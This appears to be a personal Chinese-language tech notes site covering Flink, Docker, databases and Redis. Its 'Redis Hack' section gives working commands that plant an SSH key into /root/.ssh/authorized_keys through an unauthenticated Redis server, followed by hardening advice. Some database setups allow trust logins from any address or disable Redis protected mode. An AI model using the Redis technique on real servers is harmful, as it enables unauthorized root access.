这是本节的多页打印视图。 点击此处打印.

返回本页常规视图.

编程

1 - BigData

1.1 - Flink

1.1.1 - Flink Code

CliFrontend

build StreamGraph

org.apache.flink.client.cli.CliFrontend#main

FLINK_CONF_DIR=./flink-dist/src/main/resources

# submit a job
run ./flink-examples/flink-examples-streaming/target/WordCount.jar

StandaloneSessionClusterEntrypoint

run JobManager

org.apache.flink.runtime.entrypoint.StandaloneSessionClusterEntrypoint

-c ./flink-dist/src/main/resources

1.1.2 - Flink Deploy

Cluster

Starting a Session Cluster on Docker

# https://ci.apache.org/projects/flink/flink-docs-master/docs/deployment/resource-providers/standalone/docker/#starting-a-session-cluster-on-docker

FLINK_PROPERTIES="jobmanager.rpc.address: flink-jobmanager"
docker network create flink

# launch the JobManager
docker run -d \
    --name=flink-jobmanager \
    --network flink \
    --publish 8081:8081 \
    --env FLINK_PROPERTIES="${FLINK_PROPERTIES}" \
    flink jobmanager
    
# one or more TaskManager containers    
docker run -d \
    --name=flink-taskmanager1 \
    --network flink \
    --env FLINK_PROPERTIES="${FLINK_PROPERTIES}" \
    flink taskmanager
    
# submit a task    
./bin/flink run ./examples/streaming/TopSpeedWindowing.jar    

1.1.3 - Flink Principle

整体架构

Flink系统由Flink ProgramJobManagerTaskManager三个部分组成。这三部分之间都使用Akka框架(Actor System)进行通信, 通过发送消息驱动任务的推进。

Flink Program 加载用户提交的任务代码,解析并生成任务执行拓扑图,并将拓扑图提交给JobManager

JobManager基于任务执行拓扑图,生成相应的物理执行计划,将执行计划发送给TaskManager执行。除此之外,JobManager还负责协调checkpoint的生成,不断地从TaskManager收集Operator的状态,并周期性生成checkpoint,以便在系统出错时从checkpoint恢复之前的状态。

TaskManager负责管理任务执行所需的资源,执行具体的任务,并将任务产出的数据流传入给下一个任务。每个TaskManger上运行一个jvm进程。每个TaskSlot运行一个线程

一致性保证与出错处理

分布式场景中,数据会丢失、会乱序、会重复。乱序的问题,结合Event Time (表征事件发生的时间)与 Watermark(表征何时数据已经完整的标识)解决。针对丢失和重复的问题,Flink通过分布式快照(distributed snapshot),支持了Exactly Once的一致性语义

  • 分布式快照

Flink基于Chandy and Lamport算法,实现分布式快照机制

在正常的数据流中,Flink会周期性插入一种特殊的数据记录 - barrier,当算子处理到barrier的时候,会保存算子当前的状态到持久性存储。当算子包含多个输入的时候,需要对齐多个barrier(align barriers)。当算子某个输入率先接收到barrier的时候,会缓存该输入的后续数据,直到所有的输入都收到barrier之后,才会触发状态备份操作,并输出barrier到下游算子。

除了备份各个算子的状态生成snapshot之外,对于sink还需要执行一步额外操作 —— 将结果写入外部设备。Flink通过两阶段提交的机制(2PC,two-phase commit), 来实现这个分布式事务。

流量控制

下游的InputChannel从上游的ResultPartition接收数据的时候,会基于当前已经缓存的数据量,以及可申请到的LocalBufferPoolNetworkBufferPool,计算出一个Credit值返回给上游。上游基于Credit的值,来决定发送多少数据。Credit就像信用卡额度一样,不能超支。当下游发生数据拥塞时,Credit减少值为0,于是上游停止数据发送。拥塞压力不断向上游传导,形成反压。

2 - Cloud

2.1 - Consul

install

docker run -d --name=consul1 \
    -p 8500:8500 \
    -e CONSUL_BIND_INTERFACE=eth0 \
    consul
docker run -d --name consul2 -e CONSUL_BIND_INTERFACE=eth0 \
    consul agent -dev -join=172.17.0.2

# query for all the members in the cluster
docker exec -t consul consul members

curl http://localhost:8500/v1/health/service/consul?pretty

2.2 - Docker

2.2.1 - Docker Build

build

docker build [OPTIONS] PATH | URL | -

# use Dockerfile in current path to build a image
docker build -t [repository]/[username]/[remote_image_name]:[tag] ./
# or
docker build -t [local_image_name]  ./
docker image tag [local_image_name] [repository]/[username]/[remote_image_name]:[tag]
# finally
docker push [repository]/[username]/[remote_image_name]:[tag]
  • -f, –file : Name of the Dockerfile
  • –force-rm : Always remove intermediate containers
  • –no-cache : Do not use cache when building the image
  • –pull : Always attempt to pull a newer version of the image
  • –quiet, -q : Only print image ID on success
  • –tag, -t: Name and optionally a tag in the ’name:tag’ format
  • –network: Set the networking mode for the RUN instructions during build (default “default”)

Dockerfile

ENV FOO=BAR
# cid=$(docker run -e FOO=BAR <image>)
# docker commit $cid

.dockerignore

.git
README.md

2.2.2 - Docker Container

run

# 创建一个守护态的Docker容器
docker run -itd ubuntu:14.04 /bin/bash 

# docker ps
# 进入容器
docker attach <container_id> 
# 当多个窗口同时使用该命令进入该容器时,所有的窗口都会同步显示

# enter a Docker container. 
docker exec -it CONTAINER_NAME /bin/bash
# 创建一个新的容器并运行一个命令
docker run [OPTIONS] IMAGE [COMMAND] [ARG...]

OPTIONS说明:

  • -a stdin: 指定标准输入输出内容类型,可选 STDIN/STDOUT/STDERR 三项;
  • -d: 后台运行容器,并返回容器ID;
  • -i: 以交互模式运行容器,通常与 -t 同时使用;
  • -p: 端口映射,格式为:宿主端口:容器端口
  • -v: 主机的目录映射到容器
  • -t: 为容器重新分配一个伪输入终端,通常与 -i 同时使用;
  • –name=“cname”: 为容器指定一个名称;
  • –dns 8.8.8.8: 指定容器使用的DNS服务器,默认和宿主一致;
  • –dns-search example.com: 指定容器DNS搜索域名,默认和宿主一致;
  • -h “hostname”: 指定容器的hostname;
  • -e property=value: 设置环境变量;
  • –env-file=[]: 从指定文件读入环境变量;
  • –cpuset=“0-2” or –cpuset=“0,1,2”: 绑定容器到指定CPU运行;
  • **-m :**设置容器使用内存最大值;
  • –net=“bridge”: 指定容器的网络连接类型,支持 bridge/host/none/container: 四种类型;
  • –link=[]: 添加链接到另一个容器;
  • –expose=[]: 开放一个端口或一组端口;
docker start # 启动一个或多少已经被停止的容器
docker stop # 停止一个运行中的容器
docker restart # 重启容器

docker pause # 暂停容器中所有的进程。
docker unpause # 恢复容器中所有的进程。

attach

# 确保CTRL-D或C	TRL-C不会关闭容器
docker attach --sig-proxy=false

rm

OPTIONS说明:

  • **-f :**通过SIGKILL信号强制删除一个运行中的容器
  • **-l :**移除容器间的网络连接,而非容器本身
  • -v :-v 删除与容器关联的卷

create

# 创建一个新的容器但不启动它
docker create [OPTIONS] IMAGE [COMMAND] [ARG...]

exec

# 在运行的容器中执行命令
docker exec [OPTIONS] CONTAINER COMMAND [ARG...]

# tty size
docker exec -it -e LINES=$(tput lines) -e COLUMNS=$(tput cols) <cid> bash

OPTIONS说明:

  • **-d :**分离模式: 在后台运行
  • **-i :**即使没有附加也保持STDIN 打开
  • **-t :**分配一个伪终端

kill

# Kill one or more running containers
# <signal>
# KILL
docker kill -s <signal>

cp

docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|-
docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH

2.2.3 - Docker Image

# --limit int       Max number of search results (default 25)
# --no-trunc        Don't truncate output
docker search <something> 

pull

docker pull debian
# daemon mode
container_id=`docker run -itd debian /bin/bash `
docker exec -it $container_id /bin/bash  
docker attach $container_id

push

docker commit <container_id> <image_name>
docker tag <image_name> <username>/<imagename>:<tagname>
docker login -u <username> -p <password>
docker push <username>/<imagename>:<tagname>
docker logout

tag

docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]

commit

# Create a new image from a container's changes
docker commit <container_id> <image_name>
# -a, --author string   Author
# -m, --message string  Commit message

cid=$(docker run -e FOO=BAR <image>)
docker commit $cid

images

# -a, --all         Show all images (default hides intermediate images)
# --digests         Show digests
# --no-trunc        Don't truncate output
# -q, --quiet       Only show numeric IDs
docker images

rmi

# -f, --force
docker rmi [OPTIONS] IMAGE [IMAGE...]

history

# Show the history of an image
# --no-trunc        Don't truncate output
docker history [OPTIONS] IMAGE

save

# Save one or more images to a tar archive
docker save -o <tar_file_name> <image>

load

# Load an image from a tar archive or STDIN。
docker load -i <tar_file_name>

dockertags.sh

#!/bin/bash

if [ $# -lt 1 ]
then
cat << HELP

dockertags  --  list all tags for a Docker image on a remote registry.

EXAMPLE: 
    - list all tags for ubuntu:
       dockertags ubuntu

    - list all php tags containing apache:
       dockertags php apache

HELP
fi

image="$1"
tags=`wget -q https://registry.hub.docker.com/v1/repositories/${image}/tags -O -  | sed -e 's/[][]//g' -e 's/"//g' -e 's/ //g' | tr '}' '\n'  | awk -F: '{print $3}'`

if [ -n "$2" ]
then
    tags=` echo "${tags}" | grep "$2" `
fi

echo "${tags}"

2.2.4 - Docker Install

docker

docker-ce

# https://docs.docker.com/engine/install/debian/
sudo apt-get install \
    apt-transport-https \
    ca-certificates \
    curl \
    gnupg \
    lsb-release -y
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo \
  "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian \
  $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io

sudo systemctl status docker

sudo usermod -aG docker $USER

debian/ubuntu

sudo apt-get install docker.io
# order to perform docker without sudo prefix 
sudo usermod -aG docker $USER

sudo systemctl start docker

sudo docker run --rm hello-world

sudo apt-get autoremove --purge docker-io 
rm -rf /var/lib/docker

centos/fedora

sudo dnf install docker
# 启动 Docker 服务
# sudo service docker start
sudo systemctl start docker
docker run --rm hello-world

docker version
docker info
# 为避免输入sudo,可以把用户加入 Docker 用户组
sudo groupadd docker
sudo usermod -aG docker $USER

2.2.5 - Docker Network

# source container
docker run --name mysql -e MYSQL_ROOT_PASSWORD=server -d mysql

# received container
# 在nginx的容器中,使用db或者aliasmysql作为连接地址来连接MySQL服务
docker run --name nginx --link mysql:aliasmysql -d nginx

docker将source container中定义的环境变量全部导入到received container中,在received container中可以通过环境变量来获取连接信息

通过给/etc/hosts中加入名称和IP的解析关系来实现

network

docker容器的网络有五种模式:

1)bridge模式,–net=bridge(默认) 这是dokcer网络的默认设置,为容器创建独立的网络命名空间,容器具有独立的网卡等所有单独的网络栈,是最常用的使用方式。 在docker run启动容器的时候,如果不加–net参数,就默认采用这种网络模式。安装完docker,系统会自动添加一个供docker使用的网桥docker0,我们创建一个新的容器时, 容器通过DHCP获取一个与docker0同网段的IP地址,并默认连接到docker0网桥,以此实现容器与宿主机的网络互通。

2)host模式,–net=host 这个模式下创建出来的容器,直接使用容器宿主机的网络命名空间。 将不拥有自己独立的Network Namespace,即没有独立的网络环境。它使用宿主机的ip和端口。

3)none模式,–net=none 为容器创建独立网络命名空间,但不为它做任何网络配置,容器中只有lo,用户可以在此基础上,对容器网络做任意定制。 这个模式下,dokcer不为容器进行任何网络配置。需要我们自己为容器添加网卡,配置IP。 因此,若想使用pipework配置docker容器的ip地址,必须要在none模式下才可以。

4)container模式,–net=container:NAME_or_ID 与host模式类似,只是容器将与指定的容器共享网络命名空间。 这个模式就是指定一个已有的容器,共享该容器的IP和端口。除了网络方面两个容器共享,其他的如文件系统,进程等还是隔离开的。容器可以相以localhost访问,构成一个统一的整体。

5)用户自定义:docker 1.9版本以后新增的特性,允许容器使用第三方的网络实现或者创建单独的bridge网络,提供网络隔离能力

在用户定义网络模式下,开发者可以使用任何docker支持的第三方网络driver来定制容器的网络。并且,docker 1.9以上的版本默认自带了bridge和overlay两种类型的自定义网络driver。可以用于集成calico、weave、openvswitch等第三方厂商的网络实现。

除了docker自带的bridge driver,其他的几种driver都可以实现容器的跨主机通信。而基于bdrige driver的网络,docker会自动为其创建iptables规则,保证与其他网络之间、与docker0之间的网络隔离。

WARNING: IPv4 forwarding is disabled. Networking will not work.

echo "net.ipv4.ip_forward=1" >>/usr/lib/sysctl.d/00-system.conf
systemctl restart network && systemctl restart docker

volume

  • backup

docker volume create data
docker run -v data:/path/to/data --name data_container \
	-d -it --rm \
	busybox /bin/sh

docker run --rm --volumes-from data_container -v $(pwd):/backup busybox tar cvf /backup/data_backup.tar path/to/data
  • restore

docker run -v data:/path/to/data --name data_container2 \
	-d -it --rm \
	busybox /bin/bash

docker run --rm --volumes-from data_container2 \
	-v $(pwd):/backup busybox \
	bash -c "cd /path/to/data && tar xvf /backup/data_backup.tar --strip 1"

2.2.6 - Docker Ps

ps

docker ps -a
# Show the latest created container, Only display numeric IDs
docker ps -lq

docker ps --format 'table {{.Names}}\t{{.Image}}'

vim ~/.docker/config.json.
{
  "psFormat": "table {{.Names}}\\t{{.Image}}\\t{{.RunningFor}} ago\\t{{.Status}}\\t{{.Command}}",
  "imagesFormat": "table {{.Repository}}\\t{{.Tag}}\\t{{.ID}}\\t{{.Size}}"
}

OPTIONS说明:

  • **-a :**显示所有的容器,包括未运行的。
  • **-f :**根据条件过滤显示的内容。
  • **–format :**指定返回值的模板文件。
  • **-l :**显示最近创建的容器。
  • **-n :**列出最近创建的n个容器。
  • **–no-trunc :**不截断输出。
  • **-q :**静默模式,只显示容器编号。
  • **-s :**显示总的文件大小。

inspect

# 显示容器的第一个进程的PID
docker inspect -f {{.State.Pid}} <container_id> 

docker inspect --format='{{.RootFS.Layers}}' <image_id> 

docker inspect --format='{{.NetworkSettings.IPAddress }}' <container_id> 

获取容器/镜像的元数据

OPTIONS说明:

  • **-f :**指定返回值的模板文件。
  • **-s :**显示总的文件大小。
  • **–type :**为指定类型返回JSON。

diff

docker diff <container_id>

top

查看容器中运行的进程信息

docker top [OPTIONS] CONTAINER [ps OPTIONS]

# 查看所有运行容器的进程信息
for i in  `docker ps |grep Up|awk '{print $1}'`;do echo \ &&docker top $i; done

logs

获取容器的日志

docker logs [OPTIONS] CONTAINER
tail -f /var/lib/docker/containers/<cid>/<cid>-json.log

# 用 fluentd 收集容器日志
docker run -d \
	--log-driver=fluentd \
	--log-opt fluentd-address=${fluentd_address} \
	--log-opt tag="docker.{{.Name}}" \
nginx

OPTIONS说明:

  • -f : 跟踪日志输出
  • **–since :**显示某个开始时间的所有日志
  • -t : 显示时间戳
  • **–tail :**仅列出最新N条容器日志

Docker 引擎日志

Ubuntu(14.04) /var/log/upstart/docker.log Ubuntu(16.04) journalctl -u docker.service CentOS 7/RHEL 7/Fedora journalctl -u docker.service CoreOS journalctl -u docker.service OpenSuSE journalctl -u docker.service OSX ~/Library/Containers/com.docker.docker/Data/com.docker.driver.amd64-linux/log/docker.log Debian GNU/Linux 7 /var/log/daemon.log Debian GNU/Linux 8 journalctl -u docker.service Boot2Docker /var/log/docker.log

events

从服务器获取实时事件

docker events [OPTIONS]

OPTIONS说明:

  • **-f :**根据条件过滤事件;
  • **–since :**从指定的时间戳后显示所有事件; –since=“2016-07-01”
  • **–until :**流水时间显示到指定的时间为止;

export

将文件系统作为一个tar归档文件导出到STDOUT。

docker export [OPTIONS] CONTAINER

OPTIONS说明:

  • **-o :**将输入内容写到文件。

wait

阻塞运行直到容器停止,然后打印出它的退出代码。

docker wait CONTAINER [CONTAINER...]

port

列出指定的容器的端口映射,或者查找将PRIVATE_PORT NAT到面向公众的端口

docker port CONTAINER [PRIVATE_PORT[/PROTO]]

$

# Delete all containers
docker rm $(docker ps -a -q)
# Delete all images
docker rmi $(docker images -q)

/var/lib/docker

  1. /var/lib/docker/devicemapper/devicemapper/data #用来存储相关的存储池数据
  2. /var/lib/docker/devicemapper/devicemapper/metadata #用来存储相关的元数据。
  3. /var/lib/docker/devicemapper/metadata/ #用来存储 device_id. 大小. 以及传输_id. 初始化信息
  4. /var/lib/docker/devicemapper/mnt #用来存储挂载信息
  5. /var/lib/docker/container/ #用来存储容器信息
  6. /var/lib/docker/graph/ #用来存储镜像中间件及本身详细信息和大小 . 以及依赖信息
  7. /var/lib/docker/repositores-devicemapper #用来存储镜像基本信息
  8. /var/lib/docker/tmp #docker临时目录
  9. /var/lib/docker/trust #docker信任目录
  10. /var/lib/docker/volumes #docker卷目录

2.2.7 - Nsenter

nsenter

wget https://www.kernel.org/pub/linux/utils/util-linux/v2.32/util-linux-2.32.tar.gz
tar -zxf util-linux-2.32.tar.gz &&  cd util-linux-2.32
./configure
make

# make && make install,可能影响操作系统底层工具
cp nsenter /usr/local/bin/

docker-enter

#!/bin/sh

if [ -e $(dirname "$0")/nsenter ]; then
  # with boot2docker, nsenter is not in the PATH but it is in the same folder
  NSENTER=$(dirname "$0")/nsenter
else
  NSENTER=nsenter
fi

if [ -z "$1" ]; then
  echo "Usage: $(basename "$0") CONTAINER [COMMAND [ARG]...]"
  echo ""
  echo "Enters the Docker CONTAINER and executes the specified COMMAND."
  echo "If COMMAND is not specified, runs an interactive shell in CONTAINER."
else
  PID=$(docker inspect --format "{{.State.Pid}}" "$1")
  if [ -z "$PID" ]; then
    exit 1
  fi
  shift

  OPTS="--target $PID --mount --uts --ipc --net --pid --"

  if [ -z "$1" ]; then
    # No command given.
    # Use su to clear all host environment variables except for TERM,
    # initialize the environment variables HOME, SHELL, USER, LOGNAME, PATH,
    # and start a login shell.
    "$NSENTER" $OPTS su - root
  else
    # Use env to clear all host environment variables.
    "$NSENTER" $OPTS env --ignore-environment -- "$@"
  fi
fi

3 - Data

3.1 - ClickHouse

3.1.1 - Install ClickHouse

docker

docker run -d --name clickhouse \
    --ulimit nofile=262144:262144 \
    -p 8123:8123 -p9000:9000 \
    -e CLICKHOUSE_DB=test \
    -e CLICKHOUSE_USER=root -e CLICKHOUSE_PASSWORD=root \
    -e CLICKHOUSE_DEFAULT_ACCESS_MANAGEMENT=1 \
    clickhouse/clickhouse-server

echo 'SELECT version()' | curl 'http://localhost:18123/' --data-binary @-

3.2 - MQ

3.2.1 - Kafka

install

# https://github.com/provectus/kafka-ui
docker run -p 8080:8080 \
	-e KAFKA_CLUSTERS_0_NAME=local \
	-e KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS=kafka:9092 \
	-d provectuslabs/kafka-ui

3.3 - MySQL

3.3.1 - Install MySQL

Container

docker run -d -it --name mysql57 \
 -e MYSQL_ROOT_PASSWORD=root \
 -p 3306:3306 \
 mysql:5.7

3.4 - PostgreSQL

install

container

# -e POSTGRES_USER=postgres \
# -e POSTGRES_DB=postgres \
docker run -d -it --name postgres15 \
 -e POSTGRES_PASSWORD=postgres \
 -v ${PWD}/postgresql.conf:/var/lib/postgresql/data/postgresql.conf \
 -v ${PWD}/pg_hba.conf:/var/lib/postgresql/data/pg_hba.conf \
 -v ${PWD}/data:/var/lib/postgresql/data \
 -p 5432:5432 \
 postgres:15

docker exec -it postgres15 psql -hlocalhost -U postgres
GRANT ALL PRIVILEGES ON DATABASE postgres to postgres;
ALTER SCHEMA public OWNER to postgres;
GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO postgres;
GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO postgres;

select name, setting from pg_settings where category = 'File Locations' ;
/var/lib/postgresql/data/pg_hba.conf
local   all             all                                     trust
host    all             all             127.0.0.1/32            trust
host    all             all             ::1/128                 trust
local   replication     all                                     trust
host    replication     all             127.0.0.1/32            trust
host    replication     all             ::1/128                 trust
host   all           all            0.0.0.0/0              trust
/var/lib/postgresql/data/postgresql.conf
listen_addresses = '*'
#port = 5432    # (change requires restart)
max_connections = 100
shared_buffers = 128MB
dynamic_shared_memory_type = posix
max_wal_size = 1GB
min_wal_size = 80MB
log_timezone = 'Etc/UTC'
datestyle = 'iso, mdy'
timezone = 'Etc/UTC'
lc_messages = 'en_US.utf8'
lc_monetary = 'en_US.utf8'
lc_numeric = 'en_US.utf8'
lc_time = 'en_US.utf8'
default_text_search_config = 'pg_catalog.english'

3.5 - Redis

3.5.1 - Redis Cli

事务

  • multi 开启事务

  • exec 提交事务,执行队列中的所有命令

  • discard 放弃执行事务,清空事务队列

  • watch key1 [key2...] 监听某个键,如果在exec之前被更改了,则放弃执行事务

  • unwatch [key1...] 取消目前对键的监视,客户端断开连接也会取消监视

发布与订阅

  • subscribe key1 [key2...] 订阅频道,支持通配符的版本 psubscribe

  • unsubscribe key1 [key2...] 取消订阅频道,支持通配符的版本 punsubscribe

  • publish key value [key2...] 发布消息到频道

  • pubsub 自省

类型操作

keys *

string

set k v
# string
type k
get k
# return old value
getset k v
mset k1 v1 k2 v2
mget k1 k2

# set if not exsit
msetnx k1 v1 k2 v2
# append to the tail
append k v
# string legnth
strlen k
# increment a number string, k++
incr k
decr k
# k += d
incrby k d
decrby k d

# 覆写,从偏移量offset 开始
setrange k offset v
# 子串,含两端
getrange k start end
# 设置或清除指定偏移量上的位
setbit k offset v

setnx k v
# expire in seconds
set k v ex seconds nx

list

# 将一个或多个值 value插入到列表 key 的表头
lpush k v1 v2
# push if exist
lpushx k v
# 返回列表 key 中指定区间内的元素,区间以偏移量 start=0 和 end=-1 指定
lrange key start end
# 移除并返回列表 key 的头元素
lpop k
llen k

# 从头部开始移除列表中与参数 value 相等的元素
lrem k count v
lset k index v
# 返回列表 key 中,下标为 index 的元素
lindex k index
# 修剪
ltrim k start end
# 将值 value 插入到列表 key 当中,位于值 p 之前或之后 after
linsert k before p v

# 将一个或多个值 value插入到列表 key 的表尾
rpush k v1 v2
rpushx k v
rpop

# 在一个原子时间内,执行两个动作:
# 将列表 src 中的尾元素弹出返回,并插入到列表 dest
rpoplpush src dest

hash

hset k f v
# 将哈希表 key 中的域 field 的值设置为 value ,当且仅当域 field 不存在。
hsetnx k f v

hexists k f
hlen k

# 删除哈希表 key 中的一个或多个指定域,不存在的域将被忽略。
hdel k f1 f2

# ++
hincrby k f increment

hgetall k
# 返回哈希表 key 中的所有域
hkeys k
# 返回哈希表 key 中所有域的值
hvals k

# 同时将多个 field-value (域-值)对设置到哈希表 key 中
hmset k f1 v1 f2 v2

set

# 已经存在于集合的 member 元素将被忽略。
sadd k m1 m2
smembers k
# 集合中元素的数量
scard k

# 判断 member 元素是否集合 key 的成员
sismember k m

# 移除并返回集合中的一个随机元素
spop k
# 返回集合中的一个随机元素
srandmember k

# 移除集合 key 中的一个或多个member 元素,不存在的 member 元素会被忽略
srem k m1 m2

# 原子性操作  将 member 元素从 source 集合移动到 destination 集合
smove src dest m


sdiff set1 set2
sdiffstore diffSet set1 set2
sunion set1 set2
sinterstore interSet set1 set2

zset

zadd k score1 m1 score2 m2 
zcard k
zincrby k increment m

# 返回有序集 key 中, score 值在 min 和 max 之间
# (默认包括 score 值等于 min 或 max )的成员的数量
zcount k min max 

# 返回有序集 key 中,指定区间内的成员
# 其中成员的位置按 score 值递增(从小到大)来排序。
zrange k start end withscores
# 按 score 值递减(从大到小)
zrevrange k start end withscores

# 返回所有 score 值介于 min 和 max 之间
# (包括等于 min 或 max )的成员
zrangebyscore k min max withscores limit offset count

# 返回有序集 key 中成员 member 的排名
# 其中有序集成员按score 值递增(从小到大)顺序排列。
zrank k m
zrevrank k m
# 返回有序集 key 中,成员 member 的 score 值。
zscore k m
zrem k m1 m2
# 移除有序集 key 中,指定排名(rank)区间内的所有成员
zremrangebyrank k start end

zremrangebyscore k min max

info

info memory

used_memory, include used swap space

used_memory_human

used_memory_rss, same as top or ps, exclude used swap space

mem_fragmentation_ratio same as used_memory_rss / used_memory fragmentation ratio

health value is 1.03 for jemalloc

mem_allocator libc, jemalloc or tcmalloc

3.5.2 - Redis Deploy

container

docker run -it -d --name redis -p 6379:6379 redis

sentinel

localhost

config set protected-mode no

multi master (3 master, 3 slave, and 3 sentinel)

cat << EOF > redis.conf
port 7000
daemonize yes
cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF

mkdir 7000 7001 7002 7003 7004 7005

cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf

export redis_server='../redis/src/redis-server'
$redis_server 7000/redis.conf 
$redis_server 7001/redis.conf 
$redis_server 7002/redis.conf 
$redis_server 7003/redis.conf 
$redis_server 7004/redis.conf 
$redis_server 7005/redis.conf 
# three master & three slave
../redis/src/redis-trib.rb create --replicas 1 127.0.0.1:7000 127.0.0.1:7001 \
127.0.0.1:7002 127.0.0.1:7003 127.0.0.1:7004 127.0.0.1:7005
cat << EOF > sentinel.conf
port 26379
daemonize yes

sentinel monitor mymaster1 127.0.0.1 %port1 2
sentinel down-after-milliseconds mymaster1 60000
sentinel failover-timeout mymaster1 180000
sentinel parallel-syncs mymaster1 1

sentinel monitor mymaster2 127.0.0.1 %port2 2
sentinel down-after-milliseconds mymaster2 60000
sentinel failover-timeout mymaster2 180000
sentinel parallel-syncs mymaster2 1

sentinel monitor mymaster3 127.0.0.1 %port3 2
sentinel down-after-milliseconds mymaster3 60000
sentinel failover-timeout mymaster3 180000
sentinel parallel-syncs mymaster3 1
EOF

cat sentinel.conf | sed s/26379/26379/g | sed 's/%port1/1/g' > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g | sed 's/%port2//g' > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g | sed 's/%port3//g' > sentinel_2.conf

export redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel

single master(1 master, 5 slave, and 3 sentinel)

cat << EOF > redis.conf
port 7000
daemonize yes
protected-mode no
# cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF

mkdir 7000 7001 7002 7003 7004 7005

cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf

export redis_server='../redis/src/redis-server'
# master
$redis_server 7000/redis.conf
# slave
$redis_server 7001/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7002/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7003/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7004/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7005/redis.conf --slaveof 127.0.0.1 7000
cat << EOF > sentinel.conf
port 26379
daemonize yes
protected-mode no
sentinel monitor mymaster 127.0.0.1 7000 2
sentinel down-after-milliseconds mymaster 60000
sentinel failover-timeout mymaster 180000
sentinel parallel-syncs mymaster 1
EOF

cat sentinel.conf | sed s/26379/26379/g > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g > sentinel_2.conf

redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel

3.5.3 - Redis Hack

Remote login

How to replay

ssh-keygen –t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
$ cat foo | redis-cli -h $remote_ip -x set crack
$ redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save /root/.ssh/authorized_keys
save

How to avoid

# redis.conf
# disable to change dbfilename via remote connetion
rename-command FLUSHALL ""
rename-command CONFIG   ""
rename-command EVAL     ""
requirepass mypassword
bind 127.0.0.1

groupadd -r redis && useradd -r -g redis redis

3.5.4 - Redis Persistence

persistence

RDB

fork sub process periodically and dump to a single file

AOF, appended only file

log every writer and delete records

# after 300s, dump if at least 10 key changed
save 300 10

# aof, always no
# every second
appendfsync everysec

# grow 100% then rewrite
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb

3.5.5 - Redis Sentinel

sentinel

ping

info replication

info server

info sentinel

sentinel auth-pass <name> <password>

sentinel masters

sentinel master <name>
sentinel slaves <name>

# 返回指定master的ip和端口
# 正在进行failover或者failover已经完成,将显示被提升为master的slave的ip和端口
sentinel get-master-addr-by-name <name> 

# 重置名字匹配该正则表达式的所有的master的状态信息
sentinel reset <pattern> 

# 执行failover,无需其他sentinel同意
sentinel failover <master name> 

# 监听一个新的master
sentinel monitor <name> <ip> <port> <quorum>
# 放弃对某个master的监听
sentinel remove <name>

# 改变指定master的配置,支持多个<option> <value>
sentinel set <name> <option> <value>

conf

# 26379
redis-sentinel /path/to/sentinel.conf

redis-server /path/to/sentinel.conf --sentinel

sentinel.conf

sentinel monitor mymaster 127.0.0.1 6379 2 sentinel down-after-milliseconds mymaster 60000 sentinel failover-timeout mymaster 180000 sentinel parallel-syncs mymaster 1

sentinel monitor resque 192.168.1.3 6380 4 sentinel down-after-milliseconds resque 10000 sentinel failover-timeout resque 180000 sentinel parallel-syncs resque 5

sentinel monitor mymaster 127.0.0.1 6379 2

2 当集群中有2个sentinel认为master死了时,才能真正认为该master已经不可用了

sentinel <option_name> <master_name> <option_value>

所有的配置都可以在运行时用命令SENTINEL SET command动态修改。

down-after-milliseconds

sentinel会向master发送心跳PING来确认master是否存活,如果master在“一定时间范围”内不回应PONG 或者是回复了一个错误消息,那么这个sentinel会主观地(单方面地)认为这个master已经不可用了

parallel-syncs

在发生failover主备切换时,这个选项指定了最多可以有多少个slave同时对新的master进行同步,这个数字越小,完成failover所需的时间就越长,但是如果这个数字越大,就意味着越多的slave因为replication而不可用。可以通过将这个值设为 1 来保证每次只有一个slave处于不能处理命令请求的状态。

sentinel对于不可用有两种不同的看法,一个叫主观不可用(SDOWN),另外一个叫客观不可用(ODOWN)。SDOWN是sentinel自己主观上检测到的关于master的状态,ODOWN需要一定数量的sentinel达成一致意见才能认为一个master客观上已经宕掉,各个sentinel之间通过命令SENTINEL is_master_down_by_addr来获得其它sentinel对master的检测结果。

min-slaves-to-write 1 min-slaves-max-lag 10

